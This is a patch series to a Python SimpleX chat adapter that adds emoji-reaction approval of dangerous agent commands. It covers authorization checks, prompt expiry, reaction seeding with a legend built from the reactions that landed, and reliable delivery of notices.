             f"{self._format_exec_approval(command, description, smart_denied)}\n\n"
             f"{scope}Reply `{prefix}approve` to execute once, or "
             f"`{prefix}deny` to cancel."
         )
-        if show_legend and choices:
-            legend = "\n".join(
-                f"{emoji} = {label}" for emoji, _choice, label in choices
-            )
-            text += "\n\nOr tap a reaction on this message:\n" + legend
-        return text
+
+    @staticmethod
+    def _format_tap_legend(landed: List[str]) -> str:
+        """Explain the taps that are actually on the message, and only those."""
+        labels = {emoji: label for emoji, _choice, label in _APPROVAL_CHOICES}
+        legend = "\n".join(f"{emoji} = {labels[emoji]}" for emoji in landed)
+        return "Or tap a reaction on the message above:\n" + legend
 
     async def send_exec_approval(
         self,
@@ -1300,7 +1353,7 @@ class SimplexAdapter(BasePlatformAdapter):
         *command* arrives already credential-redacted from ``gateway/run.py``
         — do not re-redact it and do not log it.
         """
-        choices = self._approval_choices(allow_permanent, allow_session, smart_denied)
+        tiers = self._approval_tiers(allow_permanent, allow_session, smart_denied)
 
         # Housekeeping first, and before any early return: prompts nobody
         # ever answered would otherwise accumulate for the life of the
@@ -1348,10 +1401,12 @@ class SimplexAdapter(BasePlatformAdapter):
             seed = reaction_lane and self._reactions_supported is not False
 
             text = self._format_simplex_exec_approval(
-                command, description, smart_denied, choices, show_legend=seed
+                command, description, smart_denied, tiers
             )
             if not reaction_lane:
-                return await self.send(chat_id, text, metadata=metadata)
+                return await self._send_approval_message(
+                    chat_id, text, metadata=metadata
+                )
 
             item_id, delivered = await self._send_anchored_text(str(chat_ref), text)
             if not delivered:
@@ -1371,7 +1426,7 @@ class SimplexAdapter(BasePlatformAdapter):
                 chat_id=chat_id,
                 chat_ref=str(chat_ref),
                 item_id=item_id,
-                choices=frozenset(choice for _emoji, choice, _label in choices),
+                choices=tiers,
                 expires_at=time.monotonic() + _approval_prompt_ttl(),
             )
             self._approval_prompts_by_item[item_id] = prompt
@@ -1383,14 +1438,50 @@ class SimplexAdapter(BasePlatformAdapter):
                 # reply, and gateway/run.py only allows send_exec_approval 15
                 # seconds before it abandons the button lane. Prompt state is
                 # already registered, so a reaction that beats the seeding
-                # still correlates.
+                # still correlates. The legend follows from the same task,
+                # once there is a placed-taps list to describe.
                 self._spawn_background(
-                    self._seed_approval_reactions(prompt, choices)
+                    self._seed_approval_reactions(prompt, self._seed_plan(tiers))
                 )
             return SendResult(success=True, message_id=item_id)
         finally:
             if not registered:
                 self._mark_session_typed_only(session_key)
+
+    async def _send_approval_message(
+        self,
+        chat_id: str,
+        text: str,
+        metadata: Optional[Dict[str, Any]] = None,
+    ) -> SendResult:
+        """Send an approval-flow message via the structured ``/_send`` form.
+
+        Every notice this feature emits — the prompt itself on the typed
+        path, the tap legend, the acknowledgement, superseded, expired,
+        no-longer-pending and unusable-reaction replies — goes out through
+        here rather than through :meth:`send`.
+
+        :meth:`send` composes a DM as ``@<chat_id> <text>``, and the daemon
+        parses ``@x`` as a *display-name* lookup: on any contact whose
+        display name is not literally its numeric id it answers
+        ``contactNotFound`` and nothing reaches the chat, while the send
+        still reports success. (Verified against simplex-chat v7.0.0.11:
+        ``@3 hi`` → ``chatCmdError/contactNotFound``, the structured form →
+        ``newChatItems``. The media paths already use the structured form;
+        only DM text is affected. That is a separate bug in ``send`` and is
+        not fixed here.) A user who taps ✅ and sees no reply reads the tap
+        as broken, so the approval flow must not depend on that branch.
+
+        Chats with no numeric ``ChatRef`` — DMs addressed by display name —
+        fall back to :meth:`send`, which is the form that addresses them
+        correctly.
+        """
+        chat_ref = self._chat_ref(chat_id)
+        if not chat_ref:
+            return await self.send(chat_id, text, metadata=metadata)
+        composed = json.dumps([{"msgContent": {"type": "text", "text": text}}])
+        await self._send_fire_and_forget(f"/_send {chat_ref} json {composed}")
+        return SendResult(success=True)
 
     def _mark_session_typed_only(self, session_key: str) -> None:
         """Refuse the tap lane for *session_key* for one approval window.
@@ -1445,16 +1536,22 @@ class SimplexAdapter(BasePlatformAdapter):
     async def _seed_approval_reactions(
         self,
         prompt: _SimplexApprovalPrompt,
-        choices: Tuple[Tuple[str, str, str], ...],
+        plan: Tuple[Tuple[str, str, str], ...],
     ) -> None:
-        """Pre-seed the decision emoji so the user taps instead of types."""
-        for index, (emoji, _choice, _label) in enumerate(choices):
+        """Place the tap targets, then explain the ones that landed.
+
+        The legend is written from *landed* rather than from *plan*, so the
+        message can never advertise a tap that is not on it. That is why the
+        prompt goes out without a legend and this task sends one.
+        """
+        landed: List[str] = []
+        for index, (emoji, _choice, _label) in enumerate(plan):
             if prompt.resolved:
                 return
-            accepted = await self._set_reaction(
+            outcome = await self._set_reaction(
                 prompt.chat_ref, prompt.item_id, emoji, add=True
             )
-            if accepted:
+            if outcome == _REACTION_ACCEPTED:
                 self._reactions_supported = True
                 if prompt.resolved:
                     # Cleanup ran while this seed was in flight: take our own
@@ -1465,19 +1562,41 @@ class SimplexAdapter(BasePlatformAdapter):
                     )
                     return
                 prompt.seeded_emoji.append(emoji)
-            elif accepted is False and index == 0:
-                # The first emoji is ✅, which the daemon's own validator
+                landed.append(emoji)
+            elif outcome == _REACTION_CAPPED:
+                # Not a refusal: the daemon takes our reactions, we have just
+                # run out of slots on this item (three per sender). Stop here
+                # — every later target would hit the same wall — and let the
+                # legend describe what is really on the message. Deny is
+                # seeded first precisely so it is never the casualty.
+                logger.warning(
+                    "SimpleX: reaction slots full on item %s after %d of %d "
+                    "tap targets — %s and anything after it were not placed; "
+                    "the legend will list only %s",
+                    prompt.item_id,
+                    len(landed),
+                    len(plan),
+                    emoji,
+                    "".join(landed) or "nothing",
+                )
+                break
+            elif outcome == _REACTION_REJECTED and index == 0:
+                # The first emoji is 👎, which the daemon's own validator
                 # allows, so rejecting it means reactions are refused
                 # wholesale. A rejection further down the list is about that
                 # one emoji and must not disable the whole lane.
                 await self._downgrade_to_typed_approvals(prompt)
                 return
-            elif accepted is False:
+            elif outcome == _REACTION_REJECTED:
                 logger.info(
                     "SimpleX: daemon refused approval emoji %s — "
                     "the remaining tap targets still stand",
                     emoji,
                 )
+        if landed and not prompt.resolved:
+            await self._send_approval_message(
+                prompt.chat_id, self._format_tap_legend(landed)
+            )
 
     async def _downgrade_to_typed_approvals(
         self, prompt: _SimplexApprovalPrompt
@@ -1497,7 +1616,7 @@ class SimplexAdapter(BasePlatformAdapter):
             self.typed_command_prefix,
         )
         prefix = self.typed_command_prefix
-        await self.send(
+        await self._send_approval_message(
             prompt.chat_id,
             "This SimpleX daemon does not let me place the approval "
             f"reactions. Reply `{prefix}approve` or `{prefix}deny` instead.",
@@ -1596,12 +1715,12 @@ class SimplexAdapter(BasePlatformAdapter):
         if prompt.feedback_sent:
             return
         prompt.feedback_sent = True
-        await self.send(prompt.chat_id, text)
+        await self._send_approval_message(prompt.chat_id, text)
 
     async def _expire_approval_prompt(self, prompt: _SimplexApprovalPrompt) -> None:
         """Retire a prompt whose tap window closed."""
         self._retire_prompt(prompt)
-        await self.send(
+        await self._send_approval_message(
             prompt.chat_id,
             "This approval prompt has expired. Run the command again if you "
             "still want to approve it.",
@@ -1625,7 +1744,9 @@ class SimplexAdapter(BasePlatformAdapter):
         if prompt.seeded_emoji:
             self._spawn_background(self._clear_seeded_reactions(prompt))
         if notice:
-            self._spawn_background(self.send(prompt.chat_id, notice))
+            self._spawn_background(
+                self._send_approval_message(prompt.chat_id, notice)
+            )
 
     async def _handle_reaction_event(self, resp: dict) -> None:
         """Resolve a pending exec approval from a ``chatItemReaction`` event.
@@ -1669,7 +1790,7 @@ class SimplexAdapter(BasePlatformAdapter):
         # whole design rests on, and it costs one dict lookup.
         if self._approval_prompt_by_session.get(prompt.session_key) != prompt.item_id:
             self._retire_prompt(prompt)
-            await self.send(
+            await self._send_approval_message(
                 prompt.chat_id,
                 "That approval is no longer pending — a newer request "
                 "replaced it. The command did not run.",
@@ -1728,7 +1849,7 @@ class SimplexAdapter(BasePlatformAdapter):
             # Nothing was pending: a typed /approve, an interrupt, or the
             # agent-side timeout already drained the queue. Say so — silently
             # doing nothing reads as a broken tap.
-            await self.send(
+            await self._send_approval_message(
                 prompt.chat_id,
                 "That approval is no longer pending — it was already answered "
                 "or it timed out. The command did not run.",
@@ -1741,7 +1862,7 @@ class SimplexAdapter(BasePlatformAdapter):
             prompt.session_key,
             choice,
         )
-        await self.send(prompt.chat_id, _APPROVAL_ACK[choice])
+        await self._send_approval_message(prompt.chat_id, _APPROVAL_ACK[choice])
 
     # ------------------------------------------------------------------
     # Outbound — media

--- a/plugins/platforms/simplex/adapter.py
+++ b/plugins/platforms/simplex/adapter.py
@@ -52,9 +52,10 @@ import os
 import random
 import re
 import time
+from dataclasses import dataclass, field
 from datetime import datetime, timezone
 from pathlib import Path
-from typing import Any, Dict, List, Optional
+from typing import Any, Dict, List, Optional, Set, Tuple
 
 # Lazy import: BasePlatformAdapter and friends live in the main repo.
 # Imported at module top because they're stdlib-only inside Hermes — no
@@ -81,10 +82,64 @@ HEALTH_CHECK_STALE_THRESHOLD = 300.0
 # Correlation ID prefix for requests we send so we can ignore our own echoes.
 _CORR_PREFIX = "hermes-"
 
+# How long a reaction-based approval prompt stays tappable, in seconds.
+# Deliberately equal to the ``approvals.timeout`` default in
+# ``tools/approval.py`` — the two timers are independent, and a prompt that
+# outlives the agent-side wait would collect taps that resolve nothing.
+APPROVAL_PROMPT_TTL_SECONDS = 300.0
+
+# Reaction vocabulary for dangerous-command approvals: (emoji, choice, label).
+# Legend text and the pre-seeded emoji are both generated from this tuple so
+# the bot can never advertise a reaction it does not seed.
+#
+# The emoji are NOT the Matrix adapter's ✅/🌀/♾️/❌ set. The simplex-chat
+# daemon validates reaction emoji against a fixed list (``mrEmojiChar`` in
+# ``src/Simplex/Chat/Protocol.hs`` accepts only 👍👎😀😂😢❤🚀✅ and rejects
+# everything else), so 🌀/♾️/❌ would come back as command errors.
+_APPROVAL_CHOICES: Tuple[Tuple[str, str, str], ...] = (
+    ("✅", "once", "approve once"),
+    ("🚀", "session", "approve for this session"),
+    ("❤", "always", "approve always"),
+    ("👎", "deny", "deny"),
+)
+
+_APPROVAL_REACTION_MAP: Dict[str, str] = {
+    emoji: choice for emoji, choice, _label in _APPROVAL_CHOICES
+}
+# 👍 is not seeded (it would crowd the legend) but it is what people reach for
+# first, and the gateway already reads a typed 👍 as approval.
+_APPROVAL_REACTION_MAP["👍"] = "once"
+
+_APPROVAL_ACK: Dict[str, str] = {
+    "once": "✅ Approved — running this once.",
+    "session": "✅ Approved for this session.",
+    "always": "✅ Approved permanently (added to the allowlist).",
+    "deny": "👎 Denied — the command will not run.",
+}
+
+# Unicode variation selectors. ❤ arrives as U+2764 U+FE0F from most clients
+# and as bare U+2764 from others; the daemon's own validator only accepts the
+# bare code point. Normalising on the way in means one map entry per reaction
+# instead of one entry per spelling.
+_VARIATION_SELECTORS = ("\ufe0f", "\ufe0e")
+
 
 # ---------------------------------------------------------------------------
 # Helpers
 # ---------------------------------------------------------------------------
+
+def _normalize_reaction_emoji(emoji: str) -> str:
+    """Strip Unicode variation selectors from a reaction emoji."""
+    out = str(emoji or "")
+    for selector in _VARIATION_SELECTORS:
+        out = out.replace(selector, "")
+    return out
+
+
+def _env_flag(name: str) -> bool:
+    """True when an env var is set to a truthy string."""
+    return os.getenv(name, "").strip().lower() in {"true", "1", "yes"}
+
 
 def _parse_comma_list(value: str) -> List[str]:
     """Split a comma-separated string into a stripped list."""
@@ -128,6 +183,29 @@ def _is_image_ext(ext: str) -> bool:
 
 def _is_audio_ext(ext: str) -> bool:
     return ext.lower() in {".mp3", ".wav", ".ogg", ".m4a", ".aac", ".opus"}
+
+
+@dataclass
+class _SimplexApprovalPrompt:
+    """Tracks a pending SimpleX reaction-based exec approval prompt.
+
+    In-memory only, like every other adapter's approval state: a gateway
+    restart orphans pending prompts, and the agent-side wait in
+    ``tools/approval.py`` is what eventually times them out.
+    """
+
+    session_key: str
+    chat_id: str
+    chat_ref: str
+    item_id: str
+    requester_user_id: Optional[str] = None
+    expires_at: float = 0.0
+    resolved: bool = False
+    # Emoji the bot actually placed, so cleanup removes only its own.
+    seeded_emoji: List[str] = field(default_factory=list)
+    # One "that reaction isn't an option" reply per prompt: a group member
+    # reacting playfully must not turn the bot into a spam amplifier.
+    feedback_sent: bool = False
 
 
 # ---------------------------------------------------------------------------
@@ -196,6 +274,19 @@ class SimplexAdapter(BasePlatformAdapter):
         )
         self._pending_text_batches: Dict[str, MessageEvent] = {}
         self._pending_text_batch_tasks: Dict[str, asyncio.Task] = {}
+
+        # Reaction-based dangerous-command approvals. Prompts are correlated
+        # by the daemon's chat-item id: the id of the message the bot posted
+        # is what an inbound reaction event points back at.
+        self._approval_prompts_by_item: Dict[str, _SimplexApprovalPrompt] = {}
+        self._approval_prompt_by_session: Dict[str, str] = {}
+        # Tri-state feature detection for daemon reaction support: None until
+        # the first /_reaction is answered, then True/False. Never assumed —
+        # older daemons and future emoji-policy changes both show up as an
+        # explicit command error, which downgrades this adapter to the typed
+        # /approve flow instead of breaking approvals.
+        self._reactions_supported: Optional[bool] = None
+        self._background_tasks: Set[asyncio.Task] = set()
 
         logger.info(
             "SimpleX adapter initialized: url=%s auto_accept=%s groups=%s",
@@ -279,6 +370,14 @@ class SimplexAdapter(BasePlatformAdapter):
             if not fut.done():
                 fut.cancel()
         self._pending_responses.clear()
+
+        # Cancel reaction seed/cleanup tasks and drop approval prompt state.
+        for task in list(self._background_tasks):
+            if not task.done():
+                task.cancel()
+        self._background_tasks.clear()
+        self._approval_prompts_by_item.clear()
+        self._approval_prompt_by_session.clear()
 
         if hasattr(self, "_mark_disconnected"):
             self._mark_disconnected()
@@ -373,7 +472,8 @@ class SimplexAdapter(BasePlatformAdapter):
         #   {"corrId": "...", "resp": {"type": "newChatItems", ...}}
         # Older/examples may put the response fields at top-level. Normalize
         # both forms before dispatching, otherwise inbound chatItems are lost.
-        resp = event.get("resp") if isinstance(event.get("resp"), dict) else event
+        nested = event.get("resp")
+        resp = nested if isinstance(nested, dict) else event
         corr_id = event.get("corrId")
 
         # Handle correlated responses (replies to our own commands)
@@ -464,6 +564,15 @@ class SimplexAdapter(BasePlatformAdapter):
                         logger.exception(
                             "SimpleX: error processing deferred file message"
                         )
+            return
+
+        # A contact or group member reacted to one of our messages — this is
+        # how tap-to-approve reaches the approval queue.
+        if resp_type == "chatItemReaction":
+            try:
+                await self._handle_reaction_event(resp)
+            except Exception:
+                logger.exception("SimpleX: error processing reaction event")
             return
 
         if resp_type:
@@ -923,6 +1032,424 @@ class SimplexAdapter(BasePlatformAdapter):
                 })
 
         return channels
+
+    # ------------------------------------------------------------------
+    # Reaction-based exec approvals
+    # ------------------------------------------------------------------
+
+    def _spawn_background(self, coro) -> None:
+        """Run *coro* detached, holding a strong reference until it finishes."""
+        task = asyncio.create_task(coro)
+        self._background_tasks.add(task)
+        task.add_done_callback(self._background_tasks.discard)
+
+    @staticmethod
+    def _chat_ref(chat_id: str) -> Optional[str]:
+        """Build a daemon ``ChatRef`` (``@<contactId>`` / ``#<groupId>``).
+
+        Returns ``None`` for a direct chat addressed by display name. The
+        ``/_send`` and ``/_reaction`` command forms take numeric ids, while
+        ``list_channels`` deliberately emits display names for DMs because
+        the plain ``@<name> text`` send form addresses by name. Callers
+        degrade to the typed ``/approve`` flow rather than guess an id.
+        """
+        if not chat_id:
+            return None
+        if chat_id.startswith("group:"):
+            group_id = chat_id[6:]
+            return f"#{group_id}" if group_id else None
+        return f"@{chat_id}" if chat_id.isdigit() else None
+
+    async def _send_anchored_text(self, chat_ref: str, text: str) -> Tuple[Optional[str], bool]:
+        """Send text via ``/_send`` and return ``(item_id, delivered)``.
+
+        Unlike :meth:`send`, this waits for the correlated ``newChatItems``
+        reply, because a reaction has to be anchored to the daemon's
+        ``itemId`` for the message it decorates.
+
+        ``delivered`` is False only when the daemon answered with an explicit
+        error. A timeout leaves the message *possibly* delivered, so the
+        caller must report success and skip the reactions rather than resend
+        and double-post an approval prompt.
+        """
+        composed = json.dumps([{"msgContent": {"type": "text", "text": text}}])
+        resp = await self._send_command(f"/_send {chat_ref} json {composed}", timeout=15.0)
+        if resp is None:
+            return None, True
+        if resp.get("type") == "chatCmdError":
+            logger.warning("SimpleX: daemon rejected /_send for %s", chat_ref)
+            return None, False
+        for item in resp.get("chatItems") or []:
+            if not isinstance(item, dict):
+                continue
+            meta = (item.get("chatItem") or {}).get("meta") or {}
+            item_id = meta.get("itemId")
+            if item_id is not None:
+                return str(item_id), True
+        return None, True
+
+    async def _set_reaction(
+        self,
+        chat_ref: str,
+        item_id: str,
+        emoji: str,
+        *,
+        add: bool = True,
+    ) -> Optional[bool]:
+        """Add or remove one of the bot's own reactions on a chat item.
+
+        Returns True when the daemon accepted the reaction, False when it
+        answered with an explicit command error (the feature-detection
+        signal), and None when nothing came back — inconclusive, and
+        deliberately not treated as "reactions unsupported".
+        """
+        reaction = json.dumps({"type": "emoji", "emoji": emoji}, ensure_ascii=False)
+        toggle = "on" if add else "off"
+        resp = await self._send_command(
+            f"/_reaction {chat_ref} {item_id} {toggle} {reaction}", timeout=10.0
+        )
+        if resp is None:
+            return None
+        if resp.get("type") == "chatCmdError":
+            logger.info(
+                "SimpleX: daemon rejected reaction %s on item %s", emoji, item_id
+            )
+            return False
+        return True
+
+    @staticmethod
+    def _approval_choices(
+        allow_permanent: bool,
+        allow_session: bool,
+        smart_denied: bool,
+    ) -> Tuple[Tuple[str, str, str], ...]:
+        """Select the reaction tiers this particular approval actually offers.
+
+        A smart-DENY owner override is one operation only — ``tools/approval``
+        collapses any wider choice back to a single run — so the prompt must
+        not offer session or permanent scope for it.
+        """
+        if smart_denied or not allow_session:
+            offered = {"once", "deny"}
+        elif not allow_permanent:
+            offered = {"once", "session", "deny"}
+        else:
+            offered = {"once", "session", "always", "deny"}
+        return tuple(c for c in _APPROVAL_CHOICES if c[1] in offered)
+
+    def _format_simplex_exec_approval(
+        self,
+        command: str,
+        description: str,
+        smart_denied: bool,
+        choices: Tuple[Tuple[str, str, str], ...],
+    ) -> str:
+        """Compose the approval prompt: shared core, typed commands, legend."""
+        prefix = self.typed_command_prefix
+        offered = {choice for _emoji, choice, _label in choices}
+        scope = ""
+        if not smart_denied:
+            if "session" in offered:
+                scope += (
+                    f"Reply `{prefix}approve session` to approve this pattern "
+                    "for the session, "
+                )
+            if "always" in offered:
+                scope += f"`{prefix}approve always` to approve permanently, "
+        text = (
+            f"{self._format_exec_approval(command, description, smart_denied)}\n\n"
+            f"{scope}Reply `{prefix}approve` to execute once, or "
+            f"`{prefix}deny` to cancel."
+        )
+        if choices:
+            legend = "\n".join(
+                f"{emoji} = {label}" for emoji, _choice, label in choices
+            )
+            text += "\n\nOr tap a reaction on this message:\n" + legend
+        return text
+
+    async def send_exec_approval(
+        self,
+        chat_id: str,
+        command: str,
+        session_key: str,
+        description: str = "dangerous command",
+        metadata: Optional[Dict[str, Any]] = None,
+        allow_permanent: bool = True,
+        allow_session: bool = True,
+        smart_denied: bool = False,
+    ) -> SendResult:
+        """Send a reaction-based exec approval prompt for SimpleX.
+
+        Mirrors the Matrix adapter: one ordinary chat message carrying the
+        shared approval text, with the bot pre-seeding the decision emoji so
+        answering is a tap instead of a retyped command. The typed
+        ``/approve`` / ``/deny`` instructions stay in the message either way,
+        so a daemon that rejects reactions still leaves a working flow.
+
+        *command* arrives already credential-redacted from ``gateway/run.py``
+        — do not re-redact it and do not log it.
+        """
+        choices = self._approval_choices(allow_permanent, allow_session, smart_denied)
+        chat_ref = self._chat_ref(chat_id)
+        use_reactions = bool(chat_ref) and self._reactions_supported is not False
+
+        text = self._format_simplex_exec_approval(
+            command, description, smart_denied, choices if use_reactions else ()
+        )
+        if not use_reactions:
+            return await self.send(chat_id, text, metadata=metadata)
+
+        item_id, delivered = await self._send_anchored_text(str(chat_ref), text)
+        if not delivered:
+            # Let gateway/run.py fall back to its own plain-text prompt.
+            return SendResult(
+                success=False, error="SimpleX daemon rejected the approval prompt"
+            )
+        if not item_id:
+            # The prompt is out but unanchored; its typed instructions work.
+            return SendResult(success=True)
+
+        prompt = _SimplexApprovalPrompt(
+            session_key=session_key,
+            chat_id=chat_id,
+            chat_ref=str(chat_ref),
+            item_id=item_id,
+            requester_user_id=str((metadata or {}).get("requester_user_id") or "")
+            or None,
+            expires_at=time.monotonic() + APPROVAL_PROMPT_TTL_SECONDS,
+        )
+        stale_item = self._approval_prompt_by_session.get(session_key)
+        if stale_item:
+            self._approval_prompts_by_item.pop(stale_item, None)
+        self._approval_prompts_by_item[item_id] = prompt
+        self._approval_prompt_by_session[session_key] = item_id
+
+        # Seed detached: every /_reaction waits on a correlated daemon reply,
+        # and gateway/run.py only allows send_exec_approval 15 seconds before
+        # it abandons the button lane. Prompt state is already registered, so
+        # a reaction that beats the seeding still correlates.
+        self._spawn_background(self._seed_approval_reactions(prompt, choices))
+        return SendResult(success=True, message_id=item_id)
+
+    async def _seed_approval_reactions(
+        self,
+        prompt: _SimplexApprovalPrompt,
+        choices: Tuple[Tuple[str, str, str], ...],
+    ) -> None:
+        """Pre-seed the decision emoji so the user taps instead of types."""
+        for emoji, _choice, _label in choices:
+            if prompt.resolved:
+                return
+            accepted = await self._set_reaction(
+                prompt.chat_ref, prompt.item_id, emoji, add=True
+            )
+            if accepted:
+                self._reactions_supported = True
+                prompt.seeded_emoji.append(emoji)
+            elif accepted is False:
+                await self._downgrade_to_typed_approvals(prompt)
+                return
+
+    async def _downgrade_to_typed_approvals(
+        self, prompt: _SimplexApprovalPrompt
+    ) -> None:
+        """Record that this daemon refuses reactions and say so once."""
+        if self._reactions_supported is False:
+            return
+        self._reactions_supported = False
+        logger.warning(
+            "SimpleX: daemon does not accept approval reactions — "
+            "falling back to typed %sapprove for the rest of this run",
+            self.typed_command_prefix,
+        )
+        prefix = self.typed_command_prefix
+        await self.send(
+            prompt.chat_id,
+            "This SimpleX daemon does not accept approval reactions. Reply "
+            f"`{prefix}approve` or `{prefix}deny` instead.",
+        )
+
+    async def _clear_seeded_reactions(self, prompt: _SimplexApprovalPrompt) -> None:
+        """Remove the bot's own seeds, leaving the user's reaction in place.
+
+        SimpleX reactions are toggles keyed by emoji rather than addressable
+        events, so cleanup is the same command with ``off`` — there is no
+        redaction step and nothing to schedule around delivery lag.
+        """
+        for emoji in list(prompt.seeded_emoji):
+            await self._set_reaction(
+                prompt.chat_ref, prompt.item_id, emoji, add=False
+            )
+        prompt.seeded_emoji.clear()
+
+    @staticmethod
+    def _reaction_sender(wrapper: dict, chat_reaction: dict) -> Tuple[str, str]:
+        """Return ``(user_id, display_name)`` for whoever placed a reaction."""
+        chat_dir = chat_reaction.get("chatDir") or {}
+        member = chat_dir.get("groupMember") or {}
+        if isinstance(member, dict) and member:
+            return (
+                str(member.get("memberId", "") or ""),
+                str(member.get("localDisplayName", "") or ""),
+            )
+        contact = (wrapper.get("chatInfo") or {}).get("contact") or {}
+        if not isinstance(contact, dict):
+            return "", ""
+        return (
+            str(contact.get("contactId", "") or ""),
+            str(contact.get("localDisplayName", "") or ""),
+        )
+
+    def _reactor_authorized(
+        self,
+        prompt: _SimplexApprovalPrompt,
+        user_id: str,
+        display_name: str,
+    ) -> bool:
+        """Fail-closed check that this reactor may answer this prompt.
+
+        Direct chats need no allowlist lookup: the only party who can react
+        in a DM is the contact that owns it, and that contact is the one
+        whose message raised the approval — so identity is the chat id. This
+        keeps DM-paired users (``hermes pairing approve simplex``) working
+        without duplicating the gateway's authorization rules in the plugin.
+
+        Groups are different — any member can react — so a group reactor must
+        appear in ``SIMPLEX_ALLOWED_USERS``. An empty allowlist denies, which
+        leaves the typed ``/approve`` path (fully authorized by the gateway)
+        as the way in.
+        """
+        identities = {i for i in (user_id, display_name) if i}
+        if _env_flag("SIMPLEX_ALLOW_ALL_USERS") or _env_flag("GATEWAY_ALLOW_ALL_USERS"):
+            authorized = True
+        elif prompt.chat_id.startswith("group:"):
+            allowlist = set(_parse_comma_list(os.getenv("SIMPLEX_ALLOWED_USERS", "")))
+            authorized = bool(allowlist & identities)
+        else:
+            authorized = prompt.chat_id in identities
+        if not authorized:
+            return False
+
+        # Requester binding, when the gateway threads it through: only the
+        # user who triggered the command may answer for it.
+        requester = prompt.requester_user_id
+        return not (requester and user_id and user_id != requester)
+
+    async def _reaction_feedback(
+        self, prompt: _SimplexApprovalPrompt, text: str
+    ) -> None:
+        """Reply once per prompt about an unusable reaction."""
+        if prompt.feedback_sent:
+            return
+        prompt.feedback_sent = True
+        await self.send(prompt.chat_id, text)
+
+    async def _expire_approval_prompt(self, prompt: _SimplexApprovalPrompt) -> None:
+        """Retire a prompt whose tap window closed."""
+        self._retire_approval_prompt(prompt)
+        await self.send(
+            prompt.chat_id,
+            "This approval prompt has expired. Run the command again if you "
+            "still want to approve it.",
+        )
+
+    def _retire_approval_prompt(self, prompt: _SimplexApprovalPrompt) -> None:
+        """Mark a prompt done, drop its correlation state, clear the seeds."""
+        prompt.resolved = True
+        self._approval_prompts_by_item.pop(prompt.item_id, None)
+        self._approval_prompt_by_session.pop(prompt.session_key, None)
+        if prompt.seeded_emoji:
+            self._spawn_background(self._clear_seeded_reactions(prompt))
+
+    async def _handle_reaction_event(self, resp: dict) -> None:
+        """Resolve a pending exec approval from a ``chatItemReaction`` event.
+
+        The daemon reports reactions as
+        ``{"type": "chatItemReaction", "added": bool, "reaction": ACIReaction}``
+        where ``ACIReaction`` is ``{"chatInfo": ..., "chatReaction": {...}}``.
+        ``chatReaction.chatDir`` describes who reacted, and
+        ``chatReaction.chatItem`` is the message they reacted to.
+        """
+        if resp.get("added") is not True:
+            return  # un-reacting never answers a prompt
+
+        wrapper = resp.get("reaction") or {}
+        chat_reaction = wrapper.get("chatReaction") or {}
+        if not isinstance(wrapper, dict) or not isinstance(chat_reaction, dict):
+            return
+
+        chat_dir = chat_reaction.get("chatDir") or {}
+        if isinstance(chat_dir, dict) and chat_dir.get("type") in (
+            "directSnd",
+            "groupSnd",
+        ):
+            return  # our own seed echoing back
+
+        chat_item = chat_reaction.get("chatItem") or {}
+        meta = chat_item.get("meta") or {} if isinstance(chat_item, dict) else {}
+        item_id = str(meta.get("itemId") or "")
+        if not item_id:
+            return
+
+        prompt = self._approval_prompts_by_item.get(item_id)
+        if prompt is None or prompt.resolved:
+            return
+
+        if time.monotonic() > prompt.expires_at:
+            await self._expire_approval_prompt(prompt)
+            return
+
+        user_id, display_name = self._reaction_sender(wrapper, chat_reaction)
+        if not self._reactor_authorized(prompt, user_id, display_name):
+            # Logged, not answered: an unauthorized reactor in a busy group
+            # would otherwise get the bot to post on demand.
+            logger.info(
+                "SimpleX: ignoring approval reaction from unauthorized user %s",
+                _redact_id(user_id),
+            )
+            return
+
+        msg_reaction = chat_reaction.get("reaction") or {}
+        emoji = _normalize_reaction_emoji(
+            msg_reaction.get("emoji", "") if isinstance(msg_reaction, dict) else ""
+        )
+        choice = _APPROVAL_REACTION_MAP.get(emoji)
+        if not choice:
+            await self._reaction_feedback(
+                prompt, "That reaction is not one of the approval options."
+            )
+            return
+
+        try:
+            from tools.approval import resolve_gateway_approval
+
+            count = resolve_gateway_approval(prompt.session_key, choice)
+        except Exception as exc:
+            logger.error(
+                "Failed to resolve gateway approval from SimpleX reaction: %s", exc
+            )
+            return
+
+        self._retire_approval_prompt(prompt)
+        if not count:
+            # Nothing was pending: a typed /approve, an interrupt, or the
+            # agent-side timeout already drained the queue. Say so — silently
+            # doing nothing reads as a broken tap.
+            await self.send(
+                prompt.chat_id,
+                "That approval is no longer pending — it was already answered "
+                "or it timed out. The command did not run.",
+            )
+            return
+
+        logger.info(
+            "SimpleX reaction resolved %d approval(s) for session %s (choice=%s)",
+            count,
+            prompt.session_key,
+            choice,
+        )
+        await self.send(prompt.chat_id, _APPROVAL_ACK[choice])
 
     # ------------------------------------------------------------------
     # Outbound — media

--- a/plugins/platforms/simplex/adapter.py
+++ b/plugins/platforms/simplex/adapter.py
@@ -357,6 +357,16 @@ class SimplexAdapter(BasePlatformAdapter):
         # than one entry the only safe assumption is that it still does,
         # until the whole approval window lapses.
         self._typed_only_sessions: Dict[str, float] = {}
+        # Sessions with a ``send_exec_approval`` currently awaiting its
+        # prompt send, plus a per-session entry counter. Two calls for one
+        # session can interleave at that await: both would pass the
+        # single-live-prompt check before either registers. The in-flight
+        # count lets the later entrant see the earlier one; the entry
+        # counter lets the earlier entrant see the later one when it
+        # resumes. asyncio interleaves only at awaits, so plain dict
+        # mutation here is race-free.
+        self._approval_inflight: Dict[str, int] = {}
+        self._approval_entry_gen: Dict[str, int] = {}
         # Tri-state feature detection for daemon reaction support: None until
         # the first /_reaction is answered, then True/False. Never assumed —
         # older daemons and future emoji-policy changes both show up as an
@@ -456,6 +466,8 @@ class SimplexAdapter(BasePlatformAdapter):
         self._approval_prompts_by_item.clear()
         self._approval_prompt_by_session.clear()
         self._typed_only_sessions.clear()
+        self._approval_inflight.clear()
+        self._approval_entry_gen.clear()
 
         if hasattr(self, "_mark_disconnected"):
             self._mark_disconnected()
@@ -1377,6 +1389,19 @@ class SimplexAdapter(BasePlatformAdapter):
             queued = True
         else:
             queued = False
+        if self._approval_inflight.get(session_key, 0) > 0:
+            # A prompt send for this session is already in flight — the
+            # single-live-prompt check above cannot see it, because that
+            # call has not registered yet. Two live tap prompts must never
+            # exist, so the later entrant takes the typed lane and holds
+            # the session there.
+            self._mark_session_typed_only(session_key)
+            queued = True
+        self._approval_inflight[session_key] = (
+            self._approval_inflight.get(session_key, 0) + 1
+        )
+        entry_gen = self._approval_entry_gen.get(session_key, 0) + 1
+        self._approval_entry_gen[session_key] = entry_gen
 
         # Anything short of a registered prompt below leaves an approval
         # pending in core with no tappable message of its own, so the
